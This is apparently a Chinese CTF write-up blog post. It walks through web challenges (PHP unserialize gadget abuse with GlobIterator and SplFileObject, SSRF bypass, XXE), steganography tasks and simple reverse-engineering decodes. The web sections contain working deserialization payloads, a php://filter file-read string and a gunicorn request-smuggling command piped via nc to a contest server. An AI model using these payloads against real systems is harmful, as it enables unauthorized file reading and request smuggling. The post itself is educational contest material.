class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">a</span></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$un0</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$un1</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$un2</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$un3</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$un4</span>;</span><br><span class="line">    </span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__destruct</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">        <span class="keyword">if</span>(!<span class="keyword">empty</span>(<span class="keyword">$this</span>-&gt;un0) &amp;&amp; <span class="keyword">empty</span>(<span class="keyword">$this</span>-&gt;un2))&#123;</span><br><span class="line">            <span class="keyword">$this</span> -&gt; Givemeanew();</span><br><span class="line">            <span class="keyword">if</span>(<span class="keyword">$this</span> -&gt; un3 === <span class="string">&#x27;unserialize&#x27;</span>)&#123;</span><br><span class="line">                <span class="keyword">$this</span> -&gt; yigei();</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="keyword">else</span>&#123;</span><br><span class="line">                <span class="keyword">$this</span> -&gt; giao();</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">Givemeanew</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">        <span class="keyword">$this</span> -&gt; un4 = <span class="keyword">new</span> <span class="keyword">$this</span>-&gt;un0(<span class="keyword">$this</span> -&gt; un1);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">yigei</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">&#x27;Your output: &#x27;</span>.<span class="keyword">$this</span>-&gt;un4;</span><br><span class="line">    &#125;</span><br><span class="line">    </span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">giao</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">        @<span class="keyword">eval</span>(<span class="keyword">$this</span>-&gt;un2);</span><br><span class="line">    &#125;</span><br><span class="line">    </span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__wakeup</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">        <span class="keyword">include</span> <span class="keyword">$this</span> -&gt; un2.<span class="string">&#x27;hint.php&#x27;</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="variable">$data</span> = <span class="variable">$_POST</span>[<span class="string">&#x27;data&#x27;</span>];</span><br><span class="line">unserialize(<span class="variable">$data</span>);</span><br></pre></td></tr></table></figure>
<p><strong>解题收获：（对于未知函数进行分析）</strong></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">析构函数__destruct()的作用和构造函数__construct()正好相反，析构函数只有在对象被垃圾收集器收集前（即对象从内存中删除之前）才会被自动调用</span><br></pre></td></tr></table></figure>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">empty</span>() 函数用于检查一个变量是否为空。</span><br><span class="line"></span><br><span class="line"><span class="keyword">empty</span>() 判断一个变量是否被认为是空的。当一个变量并不存在，或者它的值等同于 <span class="literal">FALSE</span>，那么它会被认为不存在。</span><br></pre></td></tr></table></figure>
<p><strong>步骤：</strong></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">利用<span class="built_in">GlobIterator</span>类测文件路径。</span><br><span class="line">data=O:<span class="number">1</span>:<span class="string">&quot;a&quot;</span>:<span class="number">5</span>:&#123;s:<span class="number">3</span>:<span class="string">&quot;un0&quot;</span>;s:<span class="number">12</span>:<span class="string">&quot;GlobIterator&quot;</span>;s:<span class="number">3</span>:<span class="string">&quot;un1&quot;</span>;s:<span class="number">8</span>:<span class="string">&quot;hint.php&quot;</span>;s:<span class="number">3</span>:<span class="string">&quot;un2&quot;</span>;N;s:<span class="number">3</span>:<span class="string">&quot;un3&quot;</span>;s:<span class="number">11</span>:<span class="string">&quot;unserialize&quot;</span>;s:<span class="number">3</span>:<span class="string">&quot;un4&quot;</span>;N;&#125;</span><br><span class="line">&lt;<span class="number">2</span>&gt; 确定文件目录后，用<span class="built_in">SplFileObject</span>类进行文件读取。</span><br><span class="line">  data=O:<span class="number">1</span>:<span class="string">&quot;a&quot;</span>:<span class="number">5</span>:&#123;s:<span class="number">3</span>:<span class="string">&quot;un0&quot;</span>;s:<span class="number">13</span>:<span class="string">&quot;SplFileObject&quot;</span>;s:<span class="number">3</span>:<span class="string">&quot;un1&quot;</span>;s:<span class="number">8</span>:<span class="string">&quot;hint.php&quot;</span>;s:<span class="number">3</span>:<span class="string">&quot;un2&quot;</span>;N;s:<span class="number">3</span>:<span class="string">&quot;un3&quot;</span>;s:<span class="number">11</span>:<span class="string">&quot;unserialize&quot;</span>;s:<span class="number">3</span>:<span class="string">&quot;un4&quot;</span>;N;&#125;</span><br><span class="line">?php类似于伪协议，因此我们继续用伪协议，读取一下 hint.php. 发现 </span><br><span class="line">data=O:<span class="number">1</span>:<span class="string">&quot;a&quot;</span>:<span class="number">5</span>:&#123;s:<span class="number">3</span>:<span class="string">&quot;un0&quot;</span>;s:<span class="number">13</span>:<span class="string">&quot;SplFileObject&quot;</span>;s:<span class="number">3</span>:<span class="string">&quot;un1&quot;</span>;s:<span class="number">57</span>:<span class="string">&quot;php://filter/read=convert.base64-encode/resource=hint.php&quot;</span>;s:<span class="number">3</span>:<span class="string">&quot;un2&quot;</span>;N;s:<span class="number">3</span>:<span class="string">&quot;un3&quot;</span>;s:<span class="number">11</span>:<span class="string">&quot;unserialize&quot;</span>;s:<span class="number">3</span>:<span class="string">&quot;un4&quot;</span>;N;&#125; 得到了flag的提示：</span><br><span class="line">&lt;<span class="number">3</span>&gt; 知道flag的特征之后，回去利用<span class="built_in">GlobIterator</span>类，由于 <span class="built_in">GlobIterator</span> 类支持直接通过模式匹配来寻找文件路径，也就是说假设我们知道一个文件名的一部分，我们可以通过该类的模式匹配找到其完整的文件名。</span><br><span class="line"></span><br><span class="line">        data=O:<span class="number">1</span>:<span class="string">&quot;a&quot;</span>:<span class="number">5</span>:&#123;s:<span class="number">3</span>:<span class="string">&quot;un0&quot;</span>;s:<span class="number">12</span>:<span class="string">&quot;GlobIterator&quot;</span>;s:<span class="number">3</span>:<span class="string">&quot;un1&quot;</span>;s:<span class="number">6</span>:<span class="string">&quot;f*.txt&quot;</span>;s:<span class="number">3</span>:<span class="string">&quot;un2&quot;</span>;N;s:<span class="number">3</span>:<span class="string">&quot;un3&quot;</span>;s:<span class="number">11</span>:<span class="string">&quot;unserialize&quot;</span>;s:<span class="number">3</span>:<span class="string">&quot;un4&quot;</span>;N;&#125;</span><br><span class="line">知道了文件名和路径之后，就可以利用可读取文件类<span class="built_in">SplFileObject</span>来读取flag了。</span><br></pre></td></tr></table></figure>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">但首先要进行反编译</span><br><span class="line"><span class="variable">$b</span> = <span class="string">&#x27;fSSSbis19k_sdW15dMe.txt&#x27;</span>;</span><br><span class="line"><span class="variable">$b</span> = serialize(<span class="variable">$b</span>);</span><br><span class="line">var_dump(<span class="variable">$b</span>);</span><br><span class="line"><span class="keyword">echo</span> <span class="string">&#x27;&lt;br/&gt;&#x27;</span>;</span><br><span class="line"><span class="keyword">echo</span> <span class="string">&#x27;&lt;br/&gt;&#x27;</span>;</span><br><span class="line"></span><br><span class="line"><span class="variable">$data</span>=<span class="string">&#x27;O:1:&quot;a&quot;:5:&#123;s:3:&quot;un0&quot;;s:13:&quot;SplFileObject&quot;;s:3:&quot;un1&quot;;s:23:&quot;fSSSbis19k_sdW15dMe.txt&quot;;s:3:&quot;un2&quot;;N;s:3:&quot;un3&quot;;s:11:&quot;unserialize&quot;;s:3:&quot;un4&quot;;N;&#125;&#x27;</span>;</span><br><span class="line"><span class="variable">$data</span> = unserialize(<span class="variable">$data</span>);</span><br><span class="line">var_dump(<span class="variable">$data</span>);</span><br></pre></td></tr></table></figure>
<p>结果在post可得flag</p>
<h2 id="爱国敬业好青年-2"><a href="#爱国敬业好青年-2" class="headerlink" title="爱国敬业好青年-2"></a>爱国敬业好青年-2</h2><p><strong>步骤：</strong><br>查看源码，URL/change,URL/flag,<br><img src="https://img-blog.csdnimg.cn/99eedd8516a248b5bd730a44b62dfebe.png#pic_center" alt="在这里插入图片描述"><br><strong>解题收获：</strong></p>
<blockquote>
<p>首先对于题目具有一定的观察能力，爱国敬业好青年？图片其实已经给出位置提示<br>对于post的格式掌握准确<img src="https://img-blog.csdnimg.cn/935c8b03c5484ea5af6a3ba9fc6b5e94.png" alt="在这里插入图片描述"></p>
</blockquote>
<h2 id="Easy-SQL"><a href="#Easy-SQL" class="headerlink" title="Easy-SQL"></a>Easy-SQL</h2><p><strong>步骤：</strong><br>由题中的提示，首先进行get找注入点，从而进行初步的SQL注入<br><img src="https://img-blog.csdnimg.cn/d67d2a527afd455caec316c3af725cae.png" alt="在这里插入图片描述"><br>访问压缩包下载，可得源码分析可得。<br>满⾜username=admin并且password=password，⼀共是3列，内容：id，username，password<br>post<br><img src="https://img-blog.csdnimg.cn/2f0c4e57aa2c4aeda36efd3fdeb27af5.png" alt="请添加图片描述"><br><strong>解题收获：</strong></p>
<blockquote>
<p>MySQL8进行了一定了解，语法新特性：支持UNION联合查询、ORDER BY排序、LIMIT子句限制产生的行数。尤其注意，所在列的后一列需要用字符表示，不能用数字，否则判断到当前列的最后一个字符会判断不出！.最好用&lt;=替换&lt;，</p>
</blockquote>
<h2 id="让我康康！"><a href="#让我康康！" class="headerlink" title="让我康康！"></a>让我康康！</h2><p><strong>步骤：</strong><br>提⽰Try flag<br><img src="https://img-blog.csdnimg.cn/51b88a433e674d659eff0100c4e1218d.png" alt="在这里插入图片描述"><br>服务器是gunicorn20.0.0,想到请求⾛私<br>虚拟机进行操作</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">echo -en &quot;GET / HTTP/1.1\r\nHost: 127.0.0.1\r\nContent-Length: 123\r\nSec-Websocket-Key1: x\r\n\r\nxxxxxxxxGET /fl4g HTTP/1.1\r\nHost: 127.0.0.1/fl4g\r\nX-Forwarded-For: 127.0.0.1\r\nsecr3t_ip: 127.0.0.1\r\nContent-Length: 35\r\n\r\nGET / HTTP/1.1\r\nHost: localhost\r\n\r\n&quot; | nc 59.110.159.206 702</span><br></pre></td></tr></table></figure>
<p><strong>解题收获：</strong></p>
<blockquote>
<p>在gunicorn 20.0.4 版本中，存在一个请求走私漏洞，无论在gunicorn 前使用哪个代理，该漏洞都有效。 Http头中的<code>Sec-Websocket-Key: 1</code>，会进行特殊解析，从而引发此漏洞。</p>
</blockquote>
<h2 id="这是一道代码审计题"><a href="#这是一道代码审计题" class="headerlink" title="这是一道代码审计题"></a>这是一道代码审计题</h2><p><strong>步骤：</strong><br>网页提示，进入 /index 页面 ,进入后并无提示，尝试抓包，<br><img src="https://img-blog.csdnimg.cn/38acd95c103d4ff7a97daeef5eaec113.png#pic_center" alt="在这里插入图片描述"><br>而后发现提示，进入 ./static/code.txt<br><img src="https://img-blog.csdnimg.cn/00bdb1577cb04d2a8369a33ab958c6f4.png#pic_center" alt="在这里插入图片描述"></p>
<p><img src="https://img-blog.csdnimg.cn/bdebacc4da86461e8939fd4c48edd76e.png" alt="在这里插入图片描述"><br>用base100解码可得，由于网页限制，使得不能一次翻译到位。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br></pre></td><td class="code"><pre><span class="line">def geneSign():</span><br><span class="line">    <span class="keyword">if</span>(control_key==<span class="number">1</span>):</span><br><span class="line">        <span class="keyword">return</span> render_template(<span class="string">&quot;index.html&quot;</span>)</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        <span class="keyword">return</span> <span class="string">&quot;You have not access to this page!&quot;</span></span><br><span class="line">def check_ssrf(url):</span><br><span class="line">    hostname = urlparse(url).hostname</span><br><span class="line">    <span class="keyword">try</span>:</span><br><span class="line">        <span class="keyword">if</span> not re.<span class="keyword">match</span>(<span class="string">&#x27;https?://(?:[-\w.]|(?:%[\da-fA-F]&#123;2&#125;))+&#x27;</span>, url):</span><br><span class="line">            <span class="keyword">if</span> not re.<span class="keyword">match</span>(<span class="string">&#x27;https?://@(?:[-\w.]|(?:%[\da-fA-F]&#123;2&#125;))+&#x27;</span>, url):</span><br><span class="line">                raise BaseException(<span class="string">&quot;url format error&quot;</span>)</span><br><span class="line">        <span class="keyword">if</span>  re.<span class="keyword">match</span>(<span class="string">&#x27;https?://@(?:[-\w.]|(?:%[\da-fA-F]&#123;2&#125;))+&#x27;</span>, url):</span><br><span class="line">            <span class="keyword">if</span> judge_ip(hostname):</span><br><span class="line">                <span class="keyword">return</span> <span class="literal">True</span></span><br><span class="line">            <span class="keyword">return</span> <span class="literal">False</span>, <span class="string">&quot;You not get the right clue!&quot;</span></span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line">            ip_address = socket.getaddrinfo(hostname,<span class="string">&#x27;http&#x27;</span>)[<span class="number">0</span>][<span class="number">4</span>][<span class="number">0</span>]</span><br><span class="line">            <span class="keyword">if</span> is_inner_ipaddress(ip_address):</span><br><span class="line">                <span class="keyword">return</span> <span class="literal">False</span>,<span class="string">&quot;inner ip address attack&quot;</span></span><br><span class="line">            <span class="keyword">else</span>:</span><br><span class="line">                <span class="keyword">return</span> <span class="literal">False</span>, <span class="string">&quot;You not get the right clue!&quot;</span></span><br><span class="line">    except BaseException <span class="keyword">as</span> e:</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">False</span>, str(e)</span><br><span class="line">    except:</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">False</span>, <span class="string">&quot;unknow error&quot;</span></span><br><span class="line">def ip2long(ip_addr):</span><br><span class="line">    <span class="keyword">return</span> struct.unpack(<span class="string">&quot;!L&quot;</span>, socket.inet_aton(ip_addr))[<span class="number">0</span>]</span><br><span class="line">def is_inner_ipaddress(ip):</span><br><span class="line">    ip = ip2long(ip)</span><br><span class="line">    <span class="keyword">print</span>(ip)</span><br><span class="line">    <span class="keyword">return</span> ip2long(<span class="string">&#x27;127.0.0.0&#x27;</span>) &gt;&gt; <span class="number">24</span> == ip &gt;&gt; <span class="number">24</span> <span class="keyword">or</span> ip2long(<span class="string">&#x27;10.0.0.0&#x27;</span>) &gt;&gt; <span class="number">24</span> == ip &gt;&gt; <span class="number">24</span> <span class="keyword">or</span> ip2long(<span class="string">&#x27;172.16.0.0&#x27;</span>) &gt;&gt; <span class="number">20</span> == ip &gt;&gt; <span class="number">20</span> <span class="keyword">or</span> ip2long(<span class="string">&#x27;192.168.0.0&#x27;</span>) &gt;&gt; <span class="number">16</span> == ip &gt;&gt; <span class="number">16</span> <span class="keyword">or</span> ip2long(<span class="string">&#x27;0.0.0.0&#x27;</span>) &gt;&gt; <span class="number">24</span> == ip &gt;&gt; <span class="number">24</span></span><br><span class="line">def waf1(ip):</span><br><span class="line">    forbidden_list = [ <span class="string">&#x27;.&#x27;</span>, <span class="string">&#x27;0&#x27;</span>, <span class="string">&#x27;1&#x27;</span>, <span class="string">&#x27;2&#x27;</span>, <span class="string">&#x27;7&#x27;</span>]</span><br><span class="line">    <span class="keyword">for</span> word in forbidden_list:</span><br><span class="line">        <span class="keyword">if</span> ip <span class="keyword">and</span> word:</span><br><span class="line">            <span class="keyword">if</span> word in ip.lower():</span><br><span class="line">                <span class="keyword">return</span> <span class="literal">True</span></span><br><span class="line">    <span class="keyword">return</span> <span class="literal">False</span></span><br><span class="line">def judge_ip(ip):</span><br><span class="line">    <span class="keyword">if</span>(waf1(ip)):</span><br><span class="line">        <span class="keyword">return</span> Fasle</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        addr = addr.encode(encoding = <span class="string">&quot;utf-8&quot;</span>)</span><br><span class="line">        ipp = base64.encodestring(addr)</span><br><span class="line">        ipp = ipp.strip().lower().decode()</span><br><span class="line">        <span class="keyword">if</span>(ip==ipp):</span><br><span class="line">            <span class="keyword">global</span> control_key</span><br><span class="line">            control_key = <span class="number">1</span></span><br><span class="line">            <span class="keyword">return</span> <span class="literal">True</span></span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line">            <span class="keyword">return</span> Fals</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>访问网址<code>/index?url=https://@mti3ljaumc4x</code><br><img src="https://img-blog.csdnimg.cn/368065456d4246f484e8cd1ad8008cd6.png#pic_center" alt="在这里插入图片描述"></p>
<p>ip我们可控的，所以构造ip=/mti3ljaumc4x,可得提示，进一步在抓包中进行<code>cookic</code>替换，使用传参方式POST，</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">POST /mti3ljaumc4x/codelogin</span><br></pre></td></tr></table></figure>
<p>在codelogin⽅法中 定义了请求⽅式和请求的数据，数据就是data，cv一下<br><img src="https://img-blog.csdnimg.cn/fd5c9bd8abf54ddeadbacbb34b59c905.png#pic_center" alt="在这里插入图片描述"></p>
<p><strong>解题收获：</strong><br>contentType是xml，是个xxe，根据js构造数据包，因为是 xml 数据推测存在 xxe 漏洞，尝试文件读取（不需要写协议）</p>
<h1 id="MISC"><a href="#MISC" class="headerlink" title="MISC"></a>MISC</h1><h2 id="隐秘的信息"><a href="#隐秘的信息" class="headerlink" title="隐秘的信息"></a>隐秘的信息</h2><p><strong>步骤：</strong><br><img src="https://img-blog.csdnimg.cn/d6f22b6e68a245c29e81da291b91fca8.png#pic_center" alt="在这里插入图片描述"><br>带入压缩包<br><img src="https://img-blog.csdnimg.cn/a1c5f028f48143a79b19da71820e742a.png" alt="在这里插入图片描述"><br>fd254d0d0ded54d0 d1a9950550dd98c9a1d989e1cd19051c e1e5f7fc01f8007f<br>转二进制，删除头，解码可得<br><img src="https://img-blog.csdnimg.cn/ebb9217aa4584bb79bcdbcaccd7c4bde.png" alt="在这里插入图片描述"><br><strong>解题收获：</strong><br>Stegsolve软件进行进一步的使用理解，<br>LSB隐写有其固定的步骤：<br><img src="https://img-blog.csdnimg.cn/453f08211a3a4992a269c1d1fdad61b1.png" alt="在这里插入图片描述"></p>
<blockquote>
<p>还有一个比较简单的方法，用zsteg工具，需要kali里面在线安装：gem install zsteg，使用命令格式：zsteg filename</p>
</blockquote>
<h2 id="真相只有一个"><a href="#真相只有一个" class="headerlink" title="真相只有一个"></a>真相只有一个</h2><p><strong>步骤：</strong><br>打开压缩包，修改长宽高。<br><img src="https://img-blog.csdnimg.cn/77bb08f682794e98bf4ad14f11b55488.png" alt="在这里插入图片描述"><br>文件头前端与zip源文件数据区基本相同，修改图中文件,改后缀<br><img src="https://img-blog.csdnimg.cn/6f0ef8bb3cec4ccb8c048c90094b6ec2.png" alt="在这里插入图片描述"><br>文件爆破<br><img src="https://img-blog.csdnimg.cn/40da593dfe4a41cabecce92ed6b604d5.png" alt="在这里插入图片描述"><br><img src="https://img-blog.csdnimg.cn/2213b45a891a47da9d365bcbd194d154.png" alt="在这里插入图片描述"><br>Audacity打开<br><img src="https://img-blog.csdnimg.cn/50ae0fd800bf40ba8c779985b3a20f7b.png" alt="在这里插入图片描述"><br>cmd中<br><img src="https://img-blog.csdnimg.cn/1d3a1e6eab4841c89bd2525edfe5291d.png" alt="在这里插入图片描述"></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">.\SNOW.EXE -p isccmisc -C .\flag.txt</span><br></pre></td></tr></table></figure>
<p><strong>解题收获：</strong><br>流量包，wireshark打开，<br>进入flag.txt，发现看不到数据，利用snow隐写</p>
<h2 id="单板小将苏翊鸣"><a href="#单板小将苏翊鸣" class="headerlink" title="单板小将苏翊鸣"></a>单板小将苏翊鸣</h2><p><strong>步骤：</strong><br>进入010，修改图片高度<br><img src="https://img-blog.csdnimg.cn/f94a7de3f98d4e8a913bd6870a3cf0b2.png" alt="在这里插入图片描述"><br>扫描得到提示，密码，带入可得flag<br><img src="https://img-blog.csdnimg.cn/b629083c1edd4b58b19d6e86a4870b9c.png" alt="在这里插入图片描述"><br><strong>解题收获：</strong><br>修改图片，一般只选择修改高度，随意修改宽度大多会造成图像图片出错。</p>
<h2 id="藏在星空中的诗-1"><a href="#藏在星空中的诗-1" class="headerlink" title="藏在星空中的诗-1"></a>藏在星空中的诗-1</h2><p><strong>步骤：</strong><br>对文件图层分离，可得<br><img src="https://img-blog.csdnimg.cn/40e1461fa02e4752bbaf264ae99470f9.jpeg" alt="在这里插入图片描述"><br>将文档的星星按图上的顺序进行排列带入得到密码表<br>按txt文档顺序翻译组合可得flag。<br><strong>解题收获：</strong><br>图层的分离，没有ps软件，可以用在线网址</p>
<h2 id="藏在星空中的诗-2"><a href="#藏在星空中的诗-2" class="headerlink" title="藏在星空中的诗-2"></a>藏在星空中的诗-2</h2><p><strong>步骤：</strong><br>文件中5个为一组，每组前三个均替换成u00<br><img src="https://img-blog.csdnimg.cn/5144f238a7c347d38107f00eae5b6532.png" alt="在这里插入图片描述"><br>与表格（key_to_the_Poem）第三列对照，例✴为u+2734,则✴就用4进行替换<br><img src="https://img-blog.csdnimg.cn/b921aed49c894c78ba72896e5809ec49.png" alt="在这里插入图片描述"><br><img src="https://img-blog.csdnimg.cn/abe15638795f4d5f8b77806d982af605.png" alt="在这里插入图片描述"><br>带入解码<br><strong>解题收获：</strong><br>掌握每一种编码的形式，对于星星的规律，才能在较短时间内找到题解。</p>
<h2 id="2022冬奥会"><a href="#2022冬奥会" class="headerlink" title="2022冬奥会"></a>2022冬奥会</h2><p><strong>步骤：</strong><br>身为东道主的你知道此次冬奥会的吉祥物分别是谁吗？并且你知道这两只冬奥会的吉祥物最初设计的原型分别是什么吗？<br>按题目提示（图片修改长宽高后，还有提示），可直接将“灯笼”填入可得<br>得到一个损坏图片，拖入010既得<br><img src="https://img-blog.csdnimg.cn/fcc0441f7cf0488fae2302c330054f2d.png" alt="在这里插入图片描述"></p>
<h2 id="降维打击"><a href="#降维打击" class="headerlink" title="降维打击"></a>降维打击</h2><p><strong>步骤：</strong><br>使用010图片分离，可得<img src="https://img-blog.csdnimg.cn/9853b457ecc14b2dae3542ed33713b2b.png" alt="在这里插入图片描述"><br>zsteg工具分析，提取可得<br><img src="https://img-blog.csdnimg.cn/900425c8f7fd470f8a46f46805837325.png" alt="在这里插入图片描述"><br>魔女字体，对照翻译<br><strong>解题收获：</strong><br>PNG隐写工具 zsteg的使用方法：zsteg可以检测PNG和BMP图片里的隐写数据</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">zsteg -a [png图片]</span><br><span class="line">zsteg -E <span class="string">&quot;b1,r,lsb,yx&quot;</span> [png图片] &gt; out.png</span><br></pre></td></tr></table></figure>
<h1 id="REVERSE"><a href="#REVERSE" class="headerlink" title="REVERSE"></a>REVERSE</h1><h2 id="GetTheTable"><a href="#GetTheTable" class="headerlink" title="GetTheTable"></a>GetTheTable</h2><p><strong>步骤：</strong><br>IDA打开，找到main，tab反编译<img src="https://img-blog.csdnimg.cn/bb8cd3eaba6e48cbab04b5972b833861.png" alt="在这里插入图片描述"><br>找到信息，解码</p>
<h2 id="Bob’s-Code"><a href="#Bob’s-Code" class="headerlink" title="Bob’s Code"></a>Bob’s Code</h2><p><strong>步骤：</strong><br>IDA打开，找到main，得到字符串</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> base64</span><br><span class="line"><span class="keyword">import</span> string</span><br><span class="line"></span><br><span class="line">a = <span class="string">&#x27;代码&#x27;</span></span><br><span class="line">secret = <span class="string">&#x27;&#x27;</span></span><br><span class="line"><span class="keyword">for</span> j <span class="keyword">in</span> a:</span><br><span class="line">    <span class="keyword">if</span>(j == <span class="string">&#x27;.&#x27;</span>):</span><br><span class="line">        <span class="built_in">print</span>(j,end=<span class="string">&#x27;&#x27;</span>)</span><br><span class="line">        <span class="keyword">continue</span></span><br><span class="line">    <span class="keyword">if</span>(<span class="built_in">ord</span>(j)&gt;=<span class="number">48</span> <span class="keyword">and</span> <span class="built_in">ord</span>(j)&lt;=<span class="number">57</span>):</span><br><span class="line">        <span class="built_in">print</span>(j,end=<span class="string">&#x27;&#x27;</span>)</span><br><span class="line">        <span class="keyword">continue</span></span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">65</span>,<span class="number">127</span>):</span><br><span class="line">        <span class="keyword">if</span>(i&gt;=<span class="number">65</span> <span class="keyword">and</span> i &lt;=<span class="number">90</span>):</span><br><span class="line">            <span class="keyword">if</span>((i + <span class="number">2</span> - <span class="number">65</span>) % <span class="number">26</span> + <span class="number">65</span> == <span class="built_in">ord</span>(j)):</span><br><span class="line">                <span class="built_in">print</span>(<span class="built_in">chr</span>(i),end=<span class="string">&#x27;&#x27;</span>)</span><br><span class="line">                <span class="keyword">break</span></span><br><span class="line">        <span class="keyword">elif</span>(i&gt;=<span class="number">97</span> <span class="keyword">and</span> i &lt;= <span class="number">123</span>):</span><br><span class="line">            <span class="keyword">if</span>((i + <span class="number">2</span> - <span class="number">97</span>) % <span class="number">26</span> + <span class="number">97</span> == <span class="built_in">ord</span>(j)):</span><br><span class="line">                <span class="built_in">print</span>(<span class="built_in">chr</span>(i),end=<span class="string">&#x27;&#x27;</span>)</span><br><span class="line">                <span class="keyword">break</span></span><br><span class="line"><span class="built_in">print</span>(<span class="string">&#x27;\n&#x27;</span>)</span><br><span class="line"><span class="built_in">print</span>(secret)</span><br><span class="line">str1 = <span class="string">&#x27;====&#x27;</span></span><br><span class="line"></span><br><span class="line">string1 = <span class="string">&quot;ABCDEfghijklmnopqrsTUVWXYZabcdeFGHIJKLMNOPQRStuvwxyz0123456789-_&quot;</span></span><br><span class="line">string2 = <span class="string">&quot;ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/&quot;</span></span><br><span class="line"></span><br><span class="line">flag1 = base64.b64decode(str1.translate(<span class="built_in">str</span>.maketrans(string1,string2)))</span><br><span class="line">flag = base64.b64decode(flag1)</span><br><span class="line"><span class="built_in">print</span>(flag)</span><br></pre></td></tr></table></figure>
<p>放入a中，之后结果放入str1中，可得flag<br><strong>解题收获：</strong><br>tab进行反编译（时间长不写都忘了），其次就是脚本能力，我只会改脚本……</p>

                
            </div>
            <hr/>

            

    <div class="reprint" id="reprint-statement">
        
            <div class="reprint__author">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-user">
                        Author:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="/about" rel="external nofollow noreferrer">BvxiE</a>
                </span>
            </div>
